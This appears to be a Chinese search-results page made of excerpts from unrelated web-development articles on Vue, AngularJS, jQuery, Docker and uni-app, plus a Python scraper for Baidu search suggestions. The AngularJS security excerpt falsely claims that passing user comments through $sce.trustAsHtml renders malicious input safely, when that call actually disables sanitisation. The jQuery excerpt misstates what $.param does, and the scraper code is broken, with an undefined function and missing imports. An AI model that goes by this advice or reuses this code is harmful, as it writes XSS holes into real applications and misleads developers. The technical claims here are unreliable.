[动态渲染网页内容的JSON数据绑定技术 ]的搜索结果

...它提供了一种声明式的数据绑定、组件系统以及易于理解的API，帮助开发者创建复杂的单页应用。在本文中，Vue2.x是讨论问题的技术背景，即在使用Vue2.x版本时遇到el-table和el-select组件导致页面渲染卡顿的情况。 Element-UI , Element-UI是基于Vue.js的开源UI组件库，为开发者提供了丰富且易用的前端组件，方便快速搭建企业级桌面端网页应用。在本文中，Element-UI中的el-table和el-select组件被用来实现表格展示及选择功能，但当加载大量数据时，可能导致性能问题。 虚拟滚动（Virtual Scrolling） , 虚拟滚动是一种在Web开发中优化长列表渲染性能的技术手段。当数据量较大时，它只渲染当前视窗内的DOM元素，而不是一次性渲染整个列表的所有元素。在滚动过程中，根据滚动位置动态地添加或移除可见区域外的DOM节点，从而大大减少内存消耗并提高页面滚动流畅度。在本文中，作者建议在Vue2.x环境中使用vue-virtual-scroll-list库来实现el-table组件的虚拟滚动，以解决因DOM元素过多导致的页面渲染卡顿问题。

...的函数和方法，以简化网页开发中常见的复杂任务。在本文中，jQuery被提及作为一种广泛使用的JavaScript库，它通过封装常用功能如DOM操作、事件处理、Ajax请求等，极大提高了Web开发效率。 DOM元素 , DOM（Document Object Model）元素是HTML或XML文档中的各个组成部分，在浏览器内部以对象形式表示。每个标签、属性、文本节点等都是一个DOM元素，可以通过JavaScript进行创建、读取、修改和删除等操作。在文中，tWCitySelector插件允许开发者对用于地区选择的DOM元素进行自定义样式和属性设置，以满足个性化需求。 Ajax操作 , Ajax（Asynchronous JavaScript and XML）是一种创建快速动态网页的技术，无需刷新整个页面即可从服务器获取数据并在客户端更新部分网页内容。通过使用 XMLHttpRequest 对象或者Fetch API，JavaScript可以在后台与服务器交换数据并局部更新页面。虽然名称包含XML，但实际应用中JSON格式更为常见。在文章里，jQuery库简化了Ajax操作，使得开发者可以更方便地实现异步数据交互，例如在省市县联动选择时可能需要向服务器请求地区数据。

单向数据流 , 在Vue.js中，单向数据流是一种设计模式，它规定了数据只能从父组件流向子组件，而子组件不能直接修改其接收到的props（属性）数据。这种模式有助于提高代码可预测性，简化状态管理，并减少因双向数据绑定带来的潜在问题。 作用域插槽 , 在Vue.js组件系统中，作用域插槽是一种高级特性，允许父组件将自身的数据传递给子组件内部的特定区域（插槽）。通过这种方式，子组件可以灵活地展示来自父组件的数据或内容，增强了组件的复用性和定制能力。 指令机制 , 指令是Vue.js模板语法的核心部分，以v-前缀标识，如v-if、v-for和v-html等。它们提供了一种声明式的方式来实现DOM操作、数据绑定以及响应式更新等功能。例如，v-html指令能够根据JavaScript表达式的值动态渲染HTML内容到页面上，类似于Angular.js中的ng-bind-html指令。

...理和解析URL的相关技术和最佳实践。近期，随着Web开发技术的不断进步，以及SPA（Single Page Application）架构的广泛应用，对URL的动态处理变得愈发重要。 例如，React Router库为React应用提供了强大的路由管理功能，其中就包含了根据当前URL动态渲染组件的功能。通过useLocation()钩子函数，开发者可以便捷地获取到当前路由的URL信息，并据此实现页面内容的切换与更新。 此外，对于URL参数的提取与操作，JavaScript也提供了内置对象如URLSearchParams进行高效处理。在现代浏览器中，你可以创建一个新的URL对象，然后访问其searchParams属性来获取查询字符串中的参数，这对于动态生成API请求、个性化页面展示等方面具有极高价值。 同时，在安全性方面，正确处理和验证URL至关重要。恶意用户可能会构造包含恶意脚本或非法参数的URL，因此在实际项目中，应遵循安全编码规范，利用正则表达式或其他验证方法确保从URL获取的数据符合预期格式。 综上所述，理解并熟练运用JavaScript（包括但不限于JQuery）处理URL的方法和技术，不仅能够丰富交互体验，更能提升应用的安全性和健壮性，是每位前端开发者必备的核心技能之一。

...允许开发者通过声明式渲染和响应式数据绑定创建交互式的单页面应用程序。Vue可以与现代工具链和服务端平台轻松集成，为前端开发者提供了高效的开发体验。 单页面应用程序（SPA） , 在Web开发领域中，单页面应用程序是一种特殊的网站或网络应用设计模式，用户在浏览过程中仅加载一个HTML页面，内容的更新和交互主要通过JavaScript、Ajax等技术动态替换或修改页面的部分内容实现，无需整页刷新，从而提供更加流畅和接近原生应用的用户体验。 CSS Modules , CSS Modules是CSS模块化的一种解决方案，它在编译时为每个类名生成唯一的局部作用域名称，以防止样式冲突并增强CSS样式的可维护性和复用性。在Vue单文件组件（SFCs）中，通过使用<style>标签的scoped属性，可以实现类似CSS Modules的功能，确保组件内部的样式只影响该组件本身而不影响其他组件。 v-bind指令 , Vue.js中的v-bind指令（简写为:prop）用于将元素属性值与Vue实例的数据动态绑定。例如，在文中提到的:style= backgroundColor: color ，就是将div元素的背景颜色与其所在Vue实例中的color属性值动态关联，当color属性值发生变化时，div元素的背景颜色也会相应地实时更新。 v-for指令 , Vue.js中的v-for指令用于根据数组或者对象遍历生成DOM元素。如文中所示 <p v-for=\ (item, index) in items\ :key=index> item </p>，这段代码会基于items数组中的每一项数据item，循环渲染出多个p标签，并且为每个p标签设置一个基于数组索引的独特key值，以便Vue能够准确跟踪每个节点的身份，优化列表渲染性能和状态保持。

...强大的前端框架，以其动态数据绑定和模块化的架构深受开发者喜爱。不过，你知道吗，随着那些酷炫应用一步步长大，安全小麻烦也开始冒头了，尤其是当你得应付那些来自用户的五花八门的HTML输入时，就像是在走钢丝一样得小心翼翼。这时候，就像个超级小心眼的$SceService（严格上下文逃逸服务），咱们的应用安全得跟上了铁闸，妥妥地挡住了那些烦人的XSS（跨站脚本攻击）入侵。今天，我们将深入探讨如何利用这个服务来保护我们的应用程序。 2. $SceService 何方神圣 $SceService是AngularJS的一部分，全称是Strict Contextual Escaping Service，它的核心职责是提供了一种方式来安全地在HTML中插入用户提供的数据。它通过检测和转义潜在的恶意代码，确保浏览器不会执行它们。 3. 如何启用和使用 在开始之前，我们需要在我们的模块配置中启用$sceDelegateProvider，并告诉Angular我们打算使用trustAsHtml功能。以下是一个简单的配置示例： javascript angular.module('myApp', []) .config(['$sceDelegateProvider', function($sceDelegateProvider) { $sceDelegateProvider.resourceUrlWhitelist([ 'self', 'https://example.com/' ]); }]); 这里，我们允许资源只从self（当前域）和指定的https://example.com访问。接下来，使用$sce.trustAsHtml函数处理用户输入： javascript app.controller('MyController', ['$scope', '$sce', function($scope, $sce) { $scope.safeContent = $sce.trustAsHtml('Hello, AngularJS!'); // 使用ng-bind-html指令显示安全内容 }]); 通过trustAsHtml，Angular知道这个内容可以被安全地渲染为HTML，而不是尝试解析或执行它。 4. 避免XSS攻击 $sce策略 Angular提供了四种策略来处理注入的HTML内容：trustAsHtml（默认），trustAsScript，trustAsStyle，以及trustAsResourceUrl。不同的策略适用于各种安全场景，比方说，有的时候你得决定是放手让JavaScript大展拳脚，还是严防死守不让外部资源入侵。正确选择策略是防止XSS的关键。 5. 示例 动态内容处理 假设我们有一个评论系统，用户可以输入带有HTML的评论。我们可以这样处理： javascript app.directive('safeComment', ['$sce', function($sce) { return { restrict: 'A', link: function(scope, element, attrs) { scope.$watch('comment', function(newVal) { scope.safeComment = $sce.trustAsHtml(newVal); }); } }; }]); 这样，即使用户输入了恶意代码，Angular也会将其安全地展示，而不会被执行。 6. 总结与最佳实践 在AngularJS的世界里，$SceService就像是我们的安全卫士，确保了我们应用的稳健性。伙计，记住了啊，就像照顾小宝宝一样细心，每次用户输入时都要睁大眼睛。用trustAs这招得聪明点，别忘了时不时给你的安全策略升级换代，跟上那些狡猾威胁的新花样。通过合理的代码组织和安全意识，我们可以构建出既强大又安全的Web应用。 在实际开发中，遵循严格的输入验证、最小权限原则，以及持续学习最新的安全最佳实践，都是保护应用免受XSS攻击的重要步骤。嘿，哥们儿，AngularJS的$SceService这东东啊，就像咱们安全防护网上的重要一环。好好掌握和运用，你懂的，那绝对能让咱的项目稳如老狗，安全又可靠。

...tstrap组件事件绑定的基础之上，近期Bootstrap团队发布了其最新版本v5.3，该版本对事件系统进行了更多优化和增强，使得开发者在处理动态内容和复杂交互场景时更为得心应手。例如，新增了特定组件如Toast、Offcanvas等的自定义事件，使开发者能够更精确地监听并响应用户操作。此外，Bootstrap 5.3更加注重性能与兼容性，针对动态生成元素的事件委托机制进行了改进，确保即使在大量数据渲染或频繁DOM操作的情况下，也能保证事件的有效绑定与触发。 同时，jQuery虽然一直是Bootstrap的重要依赖项，但在现代Web开发中，原生JavaScript以及第三方库（如Vue.js、React.js）的使用越来越广泛。因此，Bootstrap团队也在积极拥抱这些变化，鼓励开发者利用框架提供的实用工具函数结合原生事件API来处理组件事件，从而提升应用性能并降低依赖风险。 对于想要进一步深入研究Bootstrap组件事件绑定实践的开发者来说，建议关注官方文档的更新说明，并结合实际项目进行尝试，同时可参考业界专家和技术博主撰写的实战教程与深度解析文章，以紧跟技术发展趋势，实现高效且优雅的前端交互体验。

...odel）模式，允许数据双向绑定，使得视图自动更新以反映数据的变化，大大提高了开发效率。 Better Scroll , 一款轻量级的滚动优化库，用于提供平滑、流畅的滚动体验，尤其是在移动设备上。它封装了浏览器的滚动API，提供了诸如防抖、渐进增强等功能，帮助开发者处理复杂的滚动场景，减少资源消耗，提升用户体验。 Intersection Observer API , HTML5的一个新特性，用于观察两个DOM节点是否发生了交集（即一个节点是否在另一个节点的可视区域内）。在滚动优化中，这个API可以用来检测元素是否进入或离开视口，从而触发相应的处理，如动态加载内容、调整布局等，实现滚动性能优化。 Model-View-ViewModel (MVVM) , 一种软件设计模式，用于描述应用程序模型（数据）与用户界面之间的关系。在Vue.js中，MVVM将数据（model）与视图（view）解耦，通过ViewModel作为桥梁，当数据变化时，视图会自动更新，反之亦然，提高了开发的简洁性和可维护性。 动态渲染 , 在前端开发中，指根据数据的变化实时更新页面内容的过程。在Vue.js中，通过模板语法和数据绑定，当数据（如 item.name ）发生变化时，对应的视图部分会被重新渲染，显示最新的数据值，这种机制被称为动态渲染。

...translate动态渲染对应的语言内容。这就意味着，开发者能够根据用户的地域喜好，轻轻松松切换应用的显示语言，让不同地区的用户都感到贴心又自在。就像是个智能小助手，随时准备为用户提供母语般的使用体验。 2. 设置与配置AngularJS国际化模块 首先，我们需要引入并配置angular-translate这个专门处理国际化的插件： javascript // 引入angular-translate库 var app = angular.module('myApp', ['pascalprecht.translate']); app.config(['$translateProvider', function ($translateProvider) { // 配置默认语言 $translateProvider.preferredLanguage('en'); // 加载语言资源文件 $translateProvider.useStaticFilesLoader({ prefix: 'languages/', suffix: '.json' }); // 允许模糊匹配，提高语言包利用率 $translateProvider.fallbackLanguage('en'); $translateProvider.useSanitizeValueStrategy('sanitize'); }]); 以上代码中，我们设置了默认语言为英语，并配置了静态文件加载器从指定路径加载JSON格式的语言资源文件。 3. 创建与使用语言资源文件 接下来，我们需要创建对应的语言资源文件，例如languages/en.json和languages/zh-cn.json： json // languages/en.json { "greeting": "Hello, world!", "buttonText": "Click me" } // languages/zh-cn.json { "greeting": "你好，世界！", "buttonText": "点击我" } 4. 在视图层应用国际化 在视图模板中，我们可以借助translate指令或过滤器来动态替换文本： html { { 'greeting' | translate } } 5. 动态切换语言 最后，为了实现用户界面语言的动态切换，可以在控制器中调用 $translate.use() 方法： javascript app.controller('MainCtrl', ['$scope', '$translate', function ($scope, $translate) { $scope.changeLanguage = function (langKey) { $translate.use(langKey); }; }]); 然后在HTML中添加一个语言选择器： html English 简体中文 到此为止，我们已经成功地实现了AngularJS单页应用的国际化支持。在整个这个过程中，AngularJS就像个超能小助手，它拥有无比灵活、强大，而且特别好懂的API接口，这可帮了我们大忙了！它把开发国际化功能的那些繁琐步骤给大大简化了，让我们的应用程序轻松突破语言障碍，飞向全球各地，无论哪个地区的用户，都能用自己习惯的语言来顺畅使用。这正是AngularJS让我们能够大显身手，轻松构建出跨越国界的强大Web应用的关键所在，它的价值简直不要太赞！

本篇文章为转载内容。原文链接：https://blog.csdn.net/Result_Sea/article/details/104201970。 该文由互联网用户投稿提供，文中观点代表作者本人意见，并不代表本站的立场。 作为信息平台，本站仅提供文章转载服务，并不拥有其所有权，也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况，请及时联系我们，我们将第一时间进行核实并删除相应内容。 采集下拉词数据 闲来无事，采集一下百度下拉数据 1 进行对应的网页分析 下拉数据属于动态的数据，鼠标点击输入框出现，划出输入框消失 所以先找到对应的数据包 就要进行抓包操作 1.1 抓包操作 发现其中的关键词，并复制 打开浏览器的开发者模式（快捷键F12）并点击这个搜索按钮 打开这个搜索按钮以后，进行粘贴操作 并且按下回车！ 由图可知，只搜索到一个包，在查看这个包内容之前，应该就有90%的把握就是这个包了 点开查看（没错 就是这个包了） 小细节：Preview是渲染之后的结果 Response是写代码请求的结果 接下来我们就上代码 -- coding: UTF-8 --import jsonimport requestsfrom faker import Fakerdef get_aim(file_name):"""从文件里获取想要的关键词"""with open(file_name, mode='r', encoding='utf-8') as file:keys = file.read()return keysdef aim_letter(aim):"""获取到网页的json数据并保存到txt文件"""url = f'https://m.baidu.com/sugrec?pre=1&p=3&ie=utf-8&json=1&prod=wise&from=wise_web&sugsid=128699,138809,114177,135846,141002,138945,140853,141677,138878,137978,141200,140173,131246,132552,137743,138165,107315,138883,140259,141754,140201,138585,141650,138253,140114,136196,140325,140579,133847,140793,140066,134046,131423,137703,110085,127969,140957,141581,140593,140865,139886,138426,138941,141190,140596&net=&os=&sp=null&rm_brand=0&callback=jsonp1&wd{aim}&sugmode=2&lid=12389568409845924354&sugid=1990018821100998871&preqy=java&_=1580993331416'headers = {'User-Agent': Faker().user_agent(),'Host': 'm.baidu.com','Referer': 'https://m.baidu.com/ssid=4348023d/s?word={aim}&ts=3254538&t_kt=0&ie=utf-8&rsv_iqid=2845402975&rsv_t=daabpEKSG2wGueEO%252FnXSVz2dj3oGTk5cF1suYK9xduVIBAnyA5yo&sa=ib&rsv_pq=2845402975&rsv_sug4=5130&tj=1&inputT=2405&sugid=1990018821100998871&ss=100'}res = requests.get(url, headers=headers) 由于获取到的数据不是标准的json数据要进行字符串的删减result = json.loads(res.text.replace('jsonp1', '').strip('()')) 保存到txt文件with open(f'百度下拉词.txt', mode='a', encoding='utf-8') as file:for key in result['g']:file.write(key + '\n')def main():"""进行整合，并捕捉错误"""name = input('请输入文件的名字：')start_time = time.time()try:letter = get_aim(name).split('\n') 利用线程池加快爬取速度with concurrent.futures.ThreadPoolExecutor(max_workers=100) as executor:for l in letter:executor.submit(get_data, l)except:print('请检查文件名是否存在或者文件名是否错误！！')else: 提示用户完成并打印运行时间时间print('' 30 + f'<{name}> 百度相关词 已完成' + '' 30)finally:print(time.time() - start_time)if __name__ == '__main__':main() 在此 要感谢我的晨哥!!!哈哈 本篇文章为转载内容。原文链接：https://blog.csdn.net/Result_Sea/article/details/104201970。 该文由互联网用户投稿提供，文中观点代表作者本人意见，并不代表本站的立场。 作为信息平台，本站仅提供文章转载服务，并不拥有其所有权，也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况，请及时联系我们，我们将第一时间进行核实并删除相应内容。

...：引言 我们经常会在网页中看到一些动态更新的内容，这些内容通常是通过AJAX或者类似的技术从服务器端获取的。而其中一种比较常见的技术就是jQuery中的get()方法。不过呢，在用这个方法捞内容的时候，我们还必须得拿到当前网页的地址，这样在有需要的时候，才能对它做出相应的处理。 序号二：jQuery中的get()方法 首先，我们需要了解jQuery中的get()方法是如何工作的。这个方法的基本语法如下： javascript $.get(url, [data], [callback]); 其中，url参数是要获取内容的服务器地址，data参数是一个可选的键值对，用于传递额外的数据给服务器，而callback参数则是在请求完成后被调用的一个函数。 序号三：如何获取当前的URL地址 那么，如何在使用get()方法加载内容的同时，也能够获取当前的URL地址呢？其实这很简单，我们只需要在get()方法中添加一个额外的参数即可。这个参数其实就是$.param()函数啦，它的作用超级实用，就是能把一堆键值对打包整理，然后变成URL那种格式的查询字符串，就像咱们平常上网时在网址后面看到的那种“？”后面跟着一串“key=value&key2=value2”的样子。这样，当我们点击调用get()这个小功能的时候，就能顺道把当前网页的URL地址给轻松拿到手啦！具体的代码如下： javascript var url = $.param({ key1: 'value1', key2: 'value2' }); $.get(url, function(data) { // 处理返回的内容 }, 'json'); 在这个例子中，我们首先定义了一个包含两个键值对的对象，并将其转换成了URL格式的查询字符串。然后，我们将这个查询字符串作为参数传递给了get()方法。最后呢，当请求顺利完成，进入到那个回调函数里头，我们就可以直接用这个data参数，来处理它返回的具体内容哈。 序号四：总结 总的来说，通过使用jQuery的get()方法，我们可以在获取动态内容的同时，也很容易地获取到当前的URL地址。这对我们在进行那些依赖于当前网页链接的操作时，可真是帮了大忙啦！因此，掌握这种技巧对于提高我们的前端开发能力是非常有益的。

...索引、搜索和分析海量数据的能力。在我们这摊子事儿里，经常得跟海量数据打交道，而且关键得手脚麻利地对这些数据进行搜索和查找，速度得快准狠，一点儿都不能含糊。这时，Elasticsearch就派上大用场了。 本文将重点介绍如何利用Elasticsearch的特性，以及如何使用ListItem.Expandable来显示一个可以扩展的列表。首先，咱们得先来唠唠啥是Elasticsearch，接着咱再深入地挖一挖怎么巧妙利用这个Elasticsearch的牛逼功能。最后呢，咱们还会手把手教你怎么用代码把这一切变成现实。 1. Elasticsearch是什么？ Elasticsearch是一个基于Lucene的全文搜索引擎。Lucene是一个非常强大的文本搜索引擎库，它可以提供高效的全文搜索和分析能力。Elasticsearch呢，你可以把它理解成Lucene的大升级版，它把Lucene的本事发扬光大了，现在能够更牛气地在多台机器上搭建分布式的索引和搜索功能，让你找东西嗖嗖快，贼给力！ 2. 如何利用Elasticsearch？ 利用Elasticsearch，我们可以轻松地创建一个可以处理大量数据的搜索引擎。首先，咱们得把数据搬进Elasticsearch这个大家伙里头。这一步操作，你有俩种接地气的方式可选：一是通过API接口来传输，二是借助一些现成的工具完成导入任务。然后，我们可以使用Elasticsearch提供的API来进行查询和检索操作。最后，我们可以通过前端界面展示查询结果。 下面，我们将通过一个具体的例子来演示如何使用Elasticsearch进行数据查询。 java // 创建一个新的索引 IndexRequest indexRequest = new IndexRequest("my_index"); indexRequest.source(jsonMapper.writeValueAsString(product), XContentType.JSON); client.index(indexRequest); // 查询索引中的数据 GetResponse response = client.get(new GetRequest("my_index", "product_id")); Map source = response.getSource(); 以上代码展示了如何向Elasticsearch中添加一条数据，并且查询索引中的数据。你瞧，Elasticsearch这玩意儿真心好用，压根没那么多复杂的步骤，就那么几个基础操作，轻轻松松就能搞定。 3. ListItem.Expandable ListItem.Expandable是Android Studio中的一种控件，它可以用来显示一个可以展开和收起的内容区域。用上这个小玩意儿，咱们就能轻轻松松展示大量信息，而且还不用担心占满屏幕空间的问题！ 下面，我们将通过一个具体的例子来演示如何使用ListItem.Expandable。 xml android:id="@+id/listView" android:layout_width="match_parent" android:layout_height="match_parent"> android:id="@+id/myExpandableLayout" android:layout_width="wrap_content" android:layout_height="wrap_content" android:background="FFFFFF" /> 以上代码展示了如何在ListView中使用MyExpandableLayout。通过这种方式，我们可以轻松地显示一个可以展开和收起的内容区域。 4. 总结 本文介绍了如何利用Elasticsearch的强大功能，以及如何使用ListItem.Expandable来显示一个可以扩展的列表。读完这篇文章，咱们就能掌握如何用Elasticsearch这个利器来对付海量数据，同时还能学到怎么运用ListItem.Expandable这个小窍门，让用户体验噌噌往上涨。 总的来说，Elasticsearch是一款非常强大的工具，它可以帮助我们高效地处理大量数据。而ListItem.Expandable则是一个非常实用的控件，它可以帮助我们优化用户体验。这两款产品都是非常值得推荐的。

...可以直接与服务器进行数据交换，而无需刷新页面。在本文中，它被用来实现GET和POST两种HTTP方法的请求操作，如初始化请求、设置请求头信息、发送请求以及监听并处理服务器返回的响应结果。 AJAX (Asynchronous JavaScript and XML) , AJAX是一种创建快速动态网页的技术，它利用了JavaScript在后台与服务器交换数据的能力，更新部分网页内容而无须重新加载整个页面。虽然名字中包含XML，但在实际应用中，JSON格式的数据更为常见。本文中通过XMLHttpRequest对象实现的GET和POST请求，正是AJAX技术的具体应用实例，使得前后端可以异步通信，提高用户体验。 Content-Type , Content-Type是HTTP协议中的一种消息头，用于定义发送到服务器或从服务器接收到的数据类型和格式。在本文中，当使用POST方法发送请求时，必须设置Content-Type为\ application/x-www-form-urlencoded\ ，以告知服务器请求体内容的编码方式（这里是表单URL编码），这样服务器才能正确解析客户端提交的数据。对于处理不同类型的请求，比如上传文件或发送JSON数据，Content-Type值也会相应变化。

...t框架，专门用于构建动态网页和单页面应用程序（SPA）。它采用了MVC（模型-视图-控制器）架构模式，并引入了指令、依赖注入等特性，使得开发者能够更加高效地创建具有丰富交互功能的Web应用。 ng-repeat , 在AngularJS框架中，“ng-repeat”是一个内置指令，用于在HTML元素上实现数据遍历渲染。通过该指令，可以将数组或对象集合中的每一项数据循环绑定到DOM元素上，生成多个相似的模板实例，从而实现数据驱动视图的效果。 虚拟滚动 , 虚拟滚动是一种提升长列表性能的优化技术，在网页应用中尤其适用于大数据量展示的情况。它只渲染当前视窗内的数据项，当用户滚动时，动态计算并更新可视区域的数据，而非一次性渲染所有数据至DOM树中。这样可以显著减少DOM元素数量，降低内存占用，提高浏览器渲染速度，提供更为流畅的用户体验。在本文中，建议使用虚拟滚动来解决“ng-repeat”在处理大量数据时可能引发的性能瓶颈问题。

...世界中，容器运行时的数据持久化是一个至关重要的议题。一般来说，Docker这家伙干活的时候，默认会把容器里的数据藏在它自己的小秘密空间里。不过你可得注意了，一旦这个容器被停止运行或者干脆被删掉，那么这些数据也就跟着玩完了，彻底消失不见啦。不过，在真实操作场景里，我们常常得把容器里面的文件系统路径，像变魔术一样映射到宿主机上。这样一来，既能保证数据能长久保存，又能轻松实现容器内外的资源共享，让大家都能方便地“互通有无”。今天，咱们要聊的话题接地气点，就是怎么捣鼓Docker的存储路径，再给它来个路径映射的小魔术，让大伙儿用起来更顺手。 2. Docker数据卷的基础理解 在深入讨论映射路径之前，我们需要先理解Docker中的一个重要概念——数据卷（Data Volumes）。数据卷这个小东西，就像一个独立的存储空间，它实实在在地存在于你的电脑（也就是宿主机）上。然后，当你启动一个Docker容器时，会把这个存储空间“搬”到容器内部的一个特定目录里。神奇的是，这个数据卷的生命周期完全不受容器的影响，也就是说，哪怕你把容器整个删掉了，这个数据卷里的所有数据都还会好好地保存着，一点儿都不会丢失！ bash 创建一个使用数据卷的nginx容器 docker run -d --name web-server -v /webapp:/usr/share/nginx/html nginx 上述命令中 -v /webapp:/usr/share/nginx/html 就创建了一个从宿主机 /webapp 映射到容器内 /usr/share/nginx/html 的数据卷。这样，容器内的网页文件实际上会存储在宿主机的 /webapp 目录下。 3. 修改Docker默认存储路径 Docker的默认存储路径通常位于 /var/lib/docker，如果这个位置的空间不足或者出于管理上的需求，我们可以对其进行修改： 3.1 Linux系统 在Linux系统中，可以通过修改Docker守护进程启动参数来改变数据存储路径： bash 停止Docker服务 sudo systemctl stop docker 编辑Docker配置文件（通常是/etc/docker/daemon.json） sudo nano /etc/docker/daemon.json 添加如下内容（假设新的存储路径为 /mnt/docker） { "data-root": "/mnt/docker" } 重启Docker服务并检查新路径是否生效 sudo systemctl start docker sudo docker info | grep "Root Dir" 3.2 Windows和Mac (Docker Desktop) 对于Windows和Mac用户，通过Docker Desktop可以更方便地更改Docker数据盘的位置： - 打开Docker Desktop应用 - 进入“Preferences”或“Settings” - 在“Resources”选项卡中找到“Disk image location”，点击“Move”按钮选择新的存储路径 - 点击“Apply & Restart”以应用更改 4. 多路径映射与复杂场景 在某些情况下，我们可能需要映射多个路径，甚至自定义路径模式。例如，下面的命令展示了如何映射多个宿主机目录到容器的不同路径： bash docker run -d \ --name my-app \ -v /host/path/config:/app/config \ -v /host/path/data:/app/data \ your-image-name 这里，我们把宿主机上的 /host/path/config 和 /host/path/data 分别映射到了容器的 /app/config 和 /app/data。 总结起来，理解和掌握Docker映射路径及修改存储路径的技术，不仅可以帮助我们更好地管理和利用资源，还能有效保证容器数据的安全性和持久性。在这个过程中，我们可没闲着，一直在热火朝天地摸索、捣鼓和实战Docker技术。亲身体验到它的神奇魅力，也实实在在地深化了对虚拟化和容器化技术的理解，收获颇丰！

本篇文章为转载内容。原文链接：https://blog.csdn.net/qq_36410795/article/details/109075488。 该文由互联网用户投稿提供，文中观点代表作者本人意见，并不代表本站的立场。 作为信息平台，本站仅提供文章转载服务，并不拥有其所有权，也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况，请及时联系我们，我们将第一时间进行核实并删除相应内容。 文章目录 1. 需求背景 1.1 源码下载 2. 问题前提及思路 3. 开始撸 3.1 设置 tabbar.js 配置不同角色不同的菜单 3.2 设置 page.json 3.3 vue 配置 3.4 tabBar组件代码 3.5 setRole方法 1. 需求背景 公司要求开发一个小程序，要求二种不同权限的人群都可以使用，使用时根据不同的权限，获取不同的tabbar，以及展示对应不同的内容。 登录页面分为 用户登录 及 管理员登录 1.2 用户登录和管理员登录的 tabbar 根据账号角色进行对应展示 1.1 源码下载 【源码】uni-app 微信小程序根据角色动态的更改底部tabbar 2. 问题前提及思路 uniapp 本身的动态设置tabbar方法 uni.setTabBarItem(OBJECT)，但是使用这个方法刷新切换时会短暂白屏以及uni.setTabBarItem只能满足动态设置tabbar一项的内容，无法实现多项的需求。所有综合考虑决定还是使用uview-ui的Tabbar底部导航栏组件。 最终选择了uni-app的uview-ui（UI框架）+ vuex来完成这个功能。其中，vuex主要是用来存储当前的tabbar内容的。 3. 开始撸 3.1 设置 tabbar.js 配置不同角色不同的菜单 在utils文件夹下新建一个tabbar.js，来存储不同权限下的底部导航数据。我这里有两种不同的权限，第二种权限比第一种权限多了两项菜单。 // 普通用户tabbarlet tab1 = [{"pagePath": "/pages/loginLogRecord/index","text": "登录记录","iconPath": "/static/icon_bx.png","selectedIconPath": "/static/icon_bx_hover.png"},{"pagePath": "/pages/accessRecord/index","text": "存取记录","iconPath": "/static/icon_adress.png","selectedIconPath": "/static/icon_adress_hover.png"},{"pagePath": "/pages/person/index","text": "我的","iconPath": "/static/icon_user.png","selectedIconPath": "/static/icon_user_hover.png"}]// 管理员用户tabbarlet tab2 = [{"pagePath": "/pages/loginLogRecord/index","text": "登录记录","iconPath": "/static/icon_bx.png","selectedIconPath": "/static/icon_bx_hover.png"},{"pagePath": "/pages/accessRecord/index","text": "存取记录","iconPath": "/static/icon_adress.png","selectedIconPath": "/static/icon_adress_hover.png"},{"pagePath": "/pages/authorizationList/index","text": "授权名单","iconPath": "/static/authorization.png","selectedIconPath": "/static/authorization_hover.png"},{"pagePath": "/pages/inventory/index","text": "盘点","iconPath": "/static/inventory.png","selectedIconPath": "/static/inventory_hover.png"},{"pagePath": "/pages/person/index","text": "我的","iconPath": "/static/icon_user.png","selectedIconPath": "/static/icon_user_hover.png"}]export default [tab1,tab2] 3.2 设置 page.json 在page.json文件里，把tabbar里的几个页面去重放进去。只是单纯的写个路径，什么都不要添加。test，iconPath，selectedIconPath 字段全部删掉这里不需要配置。 "tabBar": {"color": "333333","selectedColor": "328CFA","backgroundColor": "FFFFFF","list": [{"pagePath": "pages/loginLogRecord/index"},{"pagePath": "pages/accessRecord/index"},{"pagePath": "pages/authorizationList/index"},{"pagePath": "pages/inventory/index"},{"pagePath": "pages/person/index"}]} 3.3 vue 配置 uniapp是可以直接使用vuex的，所以，直接在项目的根目录下新建一个store文件夹，存储相关数据。 import Vue from 'vue'import Vuex from 'vuex'Vue.use(Vuex)import tabBar from '@/utils/tabbar.js'const store = new Vuex.Store({state: {wx_token: '',tabBarList: [],roleId: 0, //0 普通员工，1管理员},mutations: {// 设置wx_tokensetWxtoken(state, data) {state.wx_token = data;uni.setStorageSync('wx_token',data)},// 设置用户角色IDsetRoleId(state, data) {state.roleId = data;uni.setStorageSync('roleId',data)state.tabBarList = tabBar[data];uni.setStorageSync('tabBarList',tabBar[data])},},})export default store 在入口文件 main.js 中使用 import Vue from 'vue'import App from './App'import uView from "uview-ui";import store from './store/index'Vue.use(uView);Vue.config.productionTip = falseVue.prototype.$store = storeApp.mpType = 'app'const app = new Vue({...App,store})app.$mount() 3.4 tabBar组件代码 <template><view><u-tabbar :list="tabBarList" :active-color="activeColor" :inactive-color="inactiveColor" :height="84":border-top="borderTop"></u-tabbar></view></template><script>import store from '@/store'export default {props:{tabBarList:{type:Array,default:uni.getStorageSync('tabBarList')} },data() {return {borderTop: true,inactiveColor: '909399',activeColor: '328CFA',} },}</script> 3.5 setRole方法 登录时，获取返回的权限，然后再调用setRole方法 <script>import { mapMutations } from 'vuex';export default {data() {return {roleId:0,};},methods: {methods: {...mapMutations(['setRoleId']),},//登录login() {this.setRoleId(this.roleId)// 0或者1uni.switchTab({url: '../index/index' //然后跳转到登录后的首页})} }}</script> 本篇文章为转载内容。原文链接：https://blog.csdn.net/qq_36410795/article/details/109075488。 该文由互联网用户投稿提供，文中观点代表作者本人意见，并不代表本站的立场。 作为信息平台，本站仅提供文章转载服务，并不拥有其所有权，也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况，请及时联系我们，我们将第一时间进行核实并删除相应内容。

